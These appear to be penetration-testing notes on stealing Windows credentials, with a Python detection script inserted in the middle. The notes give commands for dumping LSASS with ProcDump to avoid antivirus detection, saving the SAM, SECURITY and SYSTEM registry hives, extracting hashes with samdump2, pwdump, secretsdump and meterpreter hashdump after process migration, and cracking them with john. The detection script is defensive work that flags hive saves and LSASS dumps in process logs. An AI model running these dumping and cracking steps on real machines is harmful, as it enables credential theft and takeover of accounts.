hashes
Use mimikatz to extract credentials from memory
Use Windows ProcDump on LSASS and analyze the dump offline to avoid AV detection
// save a copy of SAM DB
reg save hklm\sam sam.save
reg save hklm\security security.save
reg save hklm\system system.save
samdump2 system.save sam.save
pwdump system.save sam.save
python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam.save -system system.save LOCAL
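From the defender's side, the hive-save and LSASS-dump steps above are visible in process-creation logs. The following detection sketch is an added example, not part of the original notes; the event tuples, host names, file paths and rule names are constructed for illustration.

```python
import re
from collections import defaultdict

# Root-hive save/export only: the lookahead rejects subkeys such as HKLM\SYSTEM\CurrentControlSet.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\'
    r'(sam|security|system)(?=["\s]|$)', re.IGNORECASE)
# ProcDump invoked with lsass anywhere in its arguments (by name only; PID targets are not covered).
LSASS_DUMP = re.compile(r'\bprocdump(?:64)?(?:\.exe)?"?\s.*\blsass', re.IGNORECASE)

# Constructed (host, command line) process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"reg save hklm\sam sam.save"),
    ("WS01", r"reg save hklm\security security.save"),
    ("WS01", r"reg save hklm\system system.save"),
    ("WS02", r'"C:\Windows\System32\reg.exe" SAVE HKLM\SAM C:\Temp\s.hiv'),
    ("WS03", r"reg export HKLM\SYSTEM\CurrentControlSet\Services\Tcpip tcpip.reg"),
    ("WS04", r"C:\Tools\procdump64.exe lsass.exe C:\Temp\l.dmp"),
    ("WS05", r"procdump.exe w3wp.exe w3wp.dmp"),
]

def detect(events):
    """Return (alerts, critical_hosts) for an iterable of (host, cmdline) records."""
    alerts, hives = [], defaultdict(set)
    for host, cmdline in events:
        m = HIVE_SAVE.search(cmdline)
        if m:
            hive = m.group(1).upper()
            hives[host].add(hive)
            alerts.append((host, "hive_save", hive))
        elif LSASS_DUMP.search(cmdline):
            alerts.append((host, "lsass_dump", "procdump"))
    # SAM hashes are encrypted with the boot key held in SYSTEM, so seeing both
    # hives saved on one host means offline hash recovery is possible: escalate.
    critical = sorted(h for h, s in hives.items() if {"SAM", "SYSTEM"} <= s)
    return alerts, critical

if __name__ == "__main__":
    found, critical = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print("critical hosts:", critical)
```

Command-line matching is easy to evade by renaming binaries, so pair it with registry and process-access auditing on the SAM hive and on lsass.exe where available.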
meterpreter
hashdump
john myhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT-old
Trying to hashdump will initially FAIL
// priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Migrate to another process ID and then run hashdump again (which should work)
migrate 1556
hashdump
// grab the hashes to crack offline